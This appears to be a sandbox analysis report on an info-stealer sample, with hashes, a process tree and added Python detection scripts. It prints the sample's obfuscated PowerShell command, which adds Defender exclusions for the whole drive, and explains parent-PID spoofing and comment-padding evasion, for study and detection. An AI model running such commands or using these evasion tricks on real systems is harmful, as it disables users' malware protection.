Analysis

max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
submitted: 29/03/2024, 10:48
Static task: static1
Behavioral task: behavioral1 (Sample: BACONWARE V3.0.exe, Resource: win7-20240215-en)
Behavioral task: behavioral2 (Sample: BACONWARE V3.0.exe, Resource: win10v2004-20240226-en)

The signature hits, YARA matches and process tree reproduced below all come from behavioral1 (the Windows 7 x64 run).
General

Target: BACONWARE V3.0.exe
Size: 4.8MB
MD5: f3b1dd838a59c419431c5aa86c1a4feb
SHA1: 85ac1eb8a03bedcfbc3d44cedeb802f5cae2ea0a
SHA256: fad83422bd338909393c57663ab1bcafb94ec684f74fdb95aaad925e82567fa3
SHA512: dbaac6b3c531cd84eac6a9440534d18cbc599826357b1efe36cdd16be163bd68c6ddd4d3211efca0d5e8c2ca6868cfb0fb3c3e0584c515b89e1ab1cac8ef6889
SSDEEP: 98304:1vW7Ru1fkpfVmr/V9JfzD+p05u9qgo67Smy9BHbCMMjgml7/lg+QXcAz:JibHmTJfzAyQRoRmA1H8eFsA
Malware Config
Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++, first seen in August 2022.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
description           | pid  | Process     | procid_target
PID 2884 created 1188 | 2884 | svchost.exe | 21
The dropped svchost.exe (PID 2884) created a process whose recorded parent is Explorer.EXE (PID 1188) rather than 2884 itself. Read together with the process tree below, where dialer.exe (PID 2396) hangs directly under Explorer.EXE while the WriteProcessMemory events show 2884 writing into 2396, this is consistent with parent-PID spoofing (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS on the create call). Any tooling that attributes processes by the recorded PPID alone will credit dialer.exe to the user's shell.

Executes dropped EXE (3 IoCs)
pid  | Process
2884 | svchost.exe
2560 | explorer.exe
2072 | explorer.exe
Note that all three use the names of Windows binaries but run from %AppData% and %LocalAppData% (see the process tree); the real svchost.exe and explorer.exe only live under C:\Windows and C:\Windows\System32.

Loads dropped DLL (5 IoCs)
pid  | Process
1540 | BACONWARE V3.0.exe
1540 | BACONWARE V3.0.exe
1540 | BACONWARE V3.0.exe
2560 | explorer.exe
2072 | explorer.exe

YARA rule match: upx (2 IoCs)
resource                                                                    | yara_rule
behavioral1/files/0x000500000001874c-33.dat                                  | upx
behavioral1/memory/2072-37-0x000007FEF6090000-0x000007FEF64F6000-memory.dmp  | upx

Detects Pyinstaller (1 IoC)
resource                                     | yara_rule
behavioral1/files/0x0010000000014dae-13.dat  | pyinstaller

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (7 IoCs)
pid  | Process
1664 | powershell.exe
2884 | svchost.exe
2884 | svchost.exe
2396 | dialer.exe
2396 | dialer.exe
2396 | dialer.exe
2396 | dialer.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description             | pid  | Process
Token: SeDebugPrivilege | 1664 | powershell.exe

Suspicious use of WriteProcessMemory (21 IoCs)
description                      | pid  | Process            | procid_target | count
PID 1540 wrote to memory of 1664 | 1540 | BACONWARE V3.0.exe | 28            | 4
PID 1540 wrote to memory of 2884 | 1540 | BACONWARE V3.0.exe | 30            | 4
PID 1540 wrote to memory of 2560 | 1540 | BACONWARE V3.0.exe | 31            | 4
PID 2560 wrote to memory of 2072 | 2560 | explorer.exe       | 32            | 3
PID 2884 wrote to memory of 2396 | 2884 | svchost.exe        | 33            | 6
The writes from 1540 into its three direct children are the ordinary pattern of a launcher starting child processes. The six writes from the dropped svchost.exe (2884) into dialer.exe (2396), a signed Windows binary that has no reason to appear in this chain and whose parent was spoofed to Explorer.EXE, are consistent with code injection into a legitimate host process; dialer.exe then goes on to enumerate processes.
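The two signatures above that matter most for detection, parent-PID spoofing and Windows binary names running from user-writable directories, can be checked mechanically against process-creation telemetry. The following is an added example, not part of the sandbox report or of the sample: the events are constructed from the PIDs and paths in this report, and the `creator` field is assumed to come from a source that records the creating process separately from the recorded parent (a kernel process-creation callback exposes both, as CreatingThreadId and ParentProcessId; Sysmon Event ID 1 only records the parent, so this particular check cannot be done from Sysmon alone).

```python
"""Flag parent-PID spoofing and system-binary masquerading in process-creation events.

Added example for this report; not sandbox or sample code. Events are
constructed from the report's PIDs and paths. The `creator` field is assumed
to come from telemetry that records the creating process separately from the
recorded parent (e.g. a PsSetCreateProcessNotifyRoutineEx callback, which
exposes both ParentProcessId and CreatingThreadId).
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Directories where these Windows binaries legitimately live (lower-case).
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
# Names this sample reuses for its dropped files; extend for your estate.
MASQUERADE_NAMES = {"svchost.exe", "explorer.exe", "dialer.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str      # full image path of the new process
    parent: int     # PPID stored in the process object (what tasklist/Sysmon show)
    creator: int    # PID of the process that actually issued the create call


def is_ppid_spoofed(ev: ProcEvent) -> bool:
    # PROC_THREAD_ATTRIBUTE_PARENT_PROCESS lets the creator pick any parent it can
    # open with PROCESS_CREATE_PROCESS; creator != recorded parent is the tell.
    return ev.creator != ev.parent


def is_masquerading(ev: ProcEvent) -> bool:
    # A well-known Windows binary name outside the directories it ships in.
    p = PureWindowsPath(ev.image)
    return p.name.lower() in MASQUERADE_NAMES and str(p.parent).lower() not in SYSTEM_DIRS


def findings(events):
    """Return (pid, kind, detail) tuples in event order."""
    out = []
    for ev in events:
        if is_ppid_spoofed(ev):
            out.append((ev.pid, "ppid-spoof",
                        f"recorded parent {ev.parent}, real creator {ev.creator}"))
        if is_masquerading(ev):
            out.append((ev.pid, "masquerade", ev.image))
    return out


# Constructed from the report's process tree. For 2396 the recorded parent is
# Explorer.EXE (1188), but the NtCreateUserProcessOtherParentProcess IoC and the
# WriteProcessMemory events point at the dropped svchost.exe (2884) as creator.
SAMPLE_EVENTS = [
    ProcEvent(1540, r"C:\Users\Admin\AppData\Local\Temp\BACONWARE V3.0.exe", 1188, 1188),
    ProcEvent(1664, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", 1540, 1540),
    ProcEvent(2884, r"C:\Users\Admin\AppData\Roaming\svchost.exe", 1540, 1540),
    ProcEvent(2560, r"C:\Users\Admin\AppData\Local\explorer.exe", 1540, 1540),
    ProcEvent(2072, r"C:\Users\Admin\AppData\Local\explorer.exe", 2560, 2560),
    ProcEvent(2396, r"C:\Windows\SysWOW64\dialer.exe", 1188, 2884),
]

if __name__ == "__main__":
    for pid, kind, detail in findings(SAMPLE_EVENTS):
        print(f"{pid:5d}  {kind:11s}  {detail}")
```

On the report's events this yields three masquerade hits (the two dropped explorer.exe instances and the dropped svchost.exe) and one parent-PID spoof (dialer.exe). The masquerade rule is cheap and works from any process-creation log; the spoof rule needs a telemetry source that sees the creator, which is exactly why sandboxes hook NtCreateUserProcess rather than trusting the parent field.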
Processes

C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  PID: 1188

  C:\Users\Admin\AppData\Local\Temp\BACONWARE V3.0.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\BACONWARE V3.0.exe"
    PID: 1540
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="
      PID: 1664
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      The -EncodedCommand value is base64 over UTF-16LE text and decodes to:
        <#vzf#>Add-MpPreference <#nzw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#syv#> -Force <#cwr#>
      That is, it adds Microsoft Defender exclusions for the entire user profile and the entire system drive, so nothing the sample drops afterwards is scanned on access. The <#...#> block comments are inert in PowerShell and only serve to break naive string matching on the command line. Add-MpPreference needs an elevated context; whether the call succeeded in this run is not recorded here. The image path is under SysWOW64 although the command line names System32: the 32-bit dropper launched PowerShell and WoW64 file-system redirection resolved it to the 32-bit host.

    C:\Users\Admin\AppData\Roaming\svchost.exe
      command line: "C:\Users\Admin\AppData\Roaming\svchost.exe"
      PID: 2884
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\explorer.exe
      command line: "C:\Users\Admin\AppData\Local\explorer.exe"
      PID: 2560
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\explorer.exe
        command line: "C:\Users\Admin\AppData\Local\explorer.exe"
        PID: 2072
        - Executes dropped EXE
        - Loads dropped DLL

  C:\Windows\SysWOW64\dialer.exe
    command line: "C:\Windows\system32\dialer.exe"
    PID: 2396
    - Suspicious behavior: EnumeratesProcesses
    Recorded parent is Explorer.EXE (1188); the NtCreateUserProcessOtherParentProcess and WriteProcessMemory signatures above attribute its creation and the writes into it to the dropped svchost.exe (2884).

  C:\Windows\explorer.exe
    command line: "C:\Windows\explorer.exe"
    PID: 2420
    Recorded parent is Explorer.EXE (1188); this is the genuine binary under C:\Windows, not one of the dropped copies, and no signature fired on it.
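Decoding the powershell.exe argument above by hand is error-prone because -EncodedCommand wraps UTF-16LE text rather than UTF-8, and because the sample pads the script with <#...#> block comments. The following is an added example, not part of the report or of the sample: it decodes the string copied verbatim from the process tree, strips the comment padding, and pulls out the Defender exclusion paths. The regular expressions and function names are this example's own choices.

```python
"""Decode a PowerShell -EncodedCommand value and extract Defender exclusion tampering.

Added example; not code from the sandbox report or from the sample. ENCODED is
copied verbatim from the powershell.exe command line in the process tree; the
regexes and function names are this example's own.
"""
import base64
import re

ENCODED = "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="

# PowerShell block comments; the sample sprinkles these between tokens as junk.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)
# Cmdlet/parameter pairs that weaken Microsoft Defender; extend as needed.
DEFENDER_TAMPER = re.compile(
    r"(?i)\b(Add|Set)-MpPreference\b.*?"
    r"-(ExclusionPath|ExclusionProcess|ExclusionExtension|DisableRealtimeMonitoring)\b"
)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE; decoding as UTF-8 gives NUL-interleaved text."""
    return base64.b64decode(b64).decode("utf-16-le")


def normalise(script: str) -> str:
    """Replace <# ... #> comments with whitespace and collapse runs so tokens line up for matching."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def defender_exclusions(script: str) -> list:
    """Return the -ExclusionPath arguments if the script adds Defender exclusions, else []."""
    clean = normalise(script)
    if not DEFENDER_TAMPER.search(clean):
        return []
    m = re.search(r"(?i)-ExclusionPath\s+@\(([^)]*)\)", clean)
    if not m:
        return []
    return [arg.strip().strip("'\"") for arg in m.group(1).split(",")]


def analyse(b64: str) -> dict:
    """One-shot view of an encoded command: raw text, cleaned text, and exclusion paths."""
    script = decode_encoded_command(b64)
    return {
        "decoded": script,
        "normalised": normalise(script),
        "defender_exclusions": defender_exclusions(script),
    }


if __name__ == "__main__":
    for key, value in analyse(ENCODED).items():
        print(f"{key}: {value}")
```

For this sample the cleaned script is `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, with `$env:UserProfile` and `$env:SystemDrive` as the two exclusion paths. Matching on the normalised text rather than the raw command line is the point: a rule keyed on the literal string `Add-MpPreference -ExclusionPath` never sees it in the raw form because of the comment between the cmdlet and its parameter.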
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1.4MB
MD5: 3f782cf7874b03c1d20ed90d370f4329
SHA1: 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256: 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512: 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

Filesize: 4.4MB
MD5: ce453607540a4b0e0c88476042d31791
SHA1: 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256: 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512: f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

Filesize: 355KB
MD5: 2ef91bf37b3da8cad6751b665bd4e6af
SHA1: 5c15bbc721f91855388861d378cf9d26a140cead
SHA256: 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512: 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3